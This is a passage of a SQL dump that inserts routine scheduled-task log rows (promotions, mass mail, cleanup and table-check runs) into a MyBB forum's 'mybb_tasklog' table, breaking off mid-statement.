INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15223', '5', '1352264950', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15224', '9', '1352265014', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15225', '5', '1352270731', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15226', '9', '1352270779', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15227', '3', '1352271042', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15228', '1', '1352271135', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15229', '7', '1352271150', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15230', '9', '1352271676', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15231', '3', '1352271681', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15232', '1', '1352271687', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15233', '7', '1352271708', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15234', '5', '1352273587', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15235', '9', '1352273695', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15236', '3', '1352273754', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15237', '9', '1352274214', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15238', '5', '1352276833', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15239', '9', '1352276915', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15240', '3', '1352278082', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15241', '1', '1352278238', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15242', '7', '1352278267', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15243', '9', '1352278312', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15244', '5', '1352278329', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15245', '9', '1352278830', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15246', '3', '1352280386', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15247', '1', '1352280386', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15248', '7', '1352280391', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15249', '5', '1352280392', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15250', '9', '1352281784', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15251', '3', '1352283006', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15252', '5', '1352283010', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15253', '9', '1352284944', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15254', '1', '1352285014', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15255', '7', '1352285028', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15256', '5', '1352285581', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15257', '3', '1352285586', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15258', '9', '1352286069', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15259', '3', '1352286634', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15260', '1', '1352286653', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15261', '7', '1352286662', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15262', '5', '1352287870', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15263', '9', '1352287879', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15264', '3', '1352288016', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15265', '9', '1352289324', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15266', '5', '1352289343', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15267', '3', '1352289995', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15268', '1', '1352290001', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15269', '7', '1352290010', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15270', '5', '1352290011', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15271', '9', '1352290335', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15272', '5', '1352291108', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15273', '9', '1352291339', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15274', '3', '1352292181', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15275', '9', '1352292307', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15276', '5', '1352292380', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15277', '9', '1352292984', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15278', '3', '1352293169', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15279', '1', '1352293218', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15280', '7', '1352293227', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15281', '5', '1352293597', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15282', '9', '1352296619', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15283', '5', '1352296685', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15284', '3', '1352296688', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15285', '3', '1352296959', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15286', '1', '1352297806', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15287', '7', '1352297808', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15288', '5', '1352297813', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15289', '9', '1352297835', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15290', '5', '1352301553', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15291', '9', '1352301589', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15292', '3', '1352301636', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15293', '1', '1352301772', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15294', '7', '1352301775', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15295', '5', '1352304239', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15296', '9', '1352304283', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15297', '3', '1352304314', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15298', '1', '1352304486', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15299', '7', '1352304486', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15300', '5', '1352304527', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15301', '9', '1352308748', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15302', '5', '1352308859', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15303', '3', '1352308868', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15304', '1', '1352308937', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15305', '7', '1352309152', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15306', '5', '1352309159', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15307', '9', '1352309193', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15308', '3', '1352313323', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15309', '9', '1352313333', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15310', '5', '1352313352', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15311', '1', '1352313360', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15312', '7', '1352314367', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15313', '9', '1352314381', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15314', '5', '1352314394', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15315', '9', '1352314506', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15316', '3', '1352315245', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15317', '1', '1352315266', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15318', '7', '1352315273', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15319', '5', '1352315293', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15320', '9', '1352315422', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15321', '5', '1352316583', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15322', '9', '1352316626', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15323', '3', '1352316636', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15324', '9', '1352317227', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15325', '5', '1352317591', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15326', '9', '1352318125', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15327', '3', '1352318665', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15328', '1', '1352318702', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15329', '7', '1352318715', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15330', '5', '1352318721', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15331', '9', '1352319024', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15332', '5', '1352320424', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15333', '9', '1352320439', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15334', '3', '1352320638', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15335', '9', '1352320811', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15336', '5', '1352321545', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15337', '9', '1352322039', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15338', '3', '1352322150', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15339', '1', '1352322179', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15340', '7', '1352322225', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15341', '5', '1352322613', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15342', '9', '1352323187', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15343', '5', '1352324582', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15344', '9', '1352324596', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15345', '3', '1352324611', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15346', '5', '1352324974', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15347', '9', '1352325320', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15348', '3', '1352326248', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15349', '1', '1352326251', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15350', '7', '1352326252', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15351', '5', '1352326285', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15352', '9', '1352326438', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15353', '5', '1352327483', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15354', '9', '1352328080', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15355', '3', '1352328095', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15356', '5', '1352328306', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15357', '9', '1352328907', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15358', '3', '1352329389', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15359', '1', '1352330488', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15360', '7', '1352330488', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15361', '5', '1352330562', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15362', '9', '1352330912', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15363', '5', '1352330978', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15364', '3', '1352331003', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15365', '9', '1352331839', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15366', '5', '1352332094', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15367', '9', '1352332684', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15368', '3', '1352333315', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15369', '1', '1352333350', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15370', '2', '1352333355', 'The daily cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15371', '7', '1352333460', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15372', '11', '1352333460', 'The delayed moderation task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15373', '5', '1352333631', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15374', '9', '1352333661', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15375', '5', '1352335455', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15376', '9', '1352338112', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15377', '3', '1352338542', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15378', '5', '1352338791', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15379', '1', '1352338983', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15380', '7', '1352339079', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15381', '9', '1352340463', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15382', '5', '1352341624', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15383', '3', '1352341894', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15384', '1', '1352341896', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15385', '7', '1352341906', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15386', '9', '1352342068', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15387', '9', '1352346238', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15388', '5', '1352346251', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15389', '3', '1352346255', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15390', '1', '1352346261', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15391', '7', '1352346495', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15392', '5', '1352346520', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15393', '9', '1352347113', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15394', '3', '1352347517', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15395', '1', '1352348609', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15396', '7', '1352348621', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15397', '5', '1352348626', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15398', '9', '1352348946', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15399', '5', '1352348959', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15400', '3', '1352349458', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15401', '9', '1352349647', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15402', '5', '1352349933', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15403', '9', '1352353759', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15404', '3', '1352353842', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15405', '1', '1352353868', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15406', '7', '1352353876', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15407', '5', '1352353886', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15408', '9', '1352356533', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15409', '3', '1352356625', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15410', '1', '1352357248', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15411', '7', '1352361024', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15412', '5', '1352361033', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15413', '9', '1352363372', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15414', '3', '1352363377', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15415', '1', '1352363387', 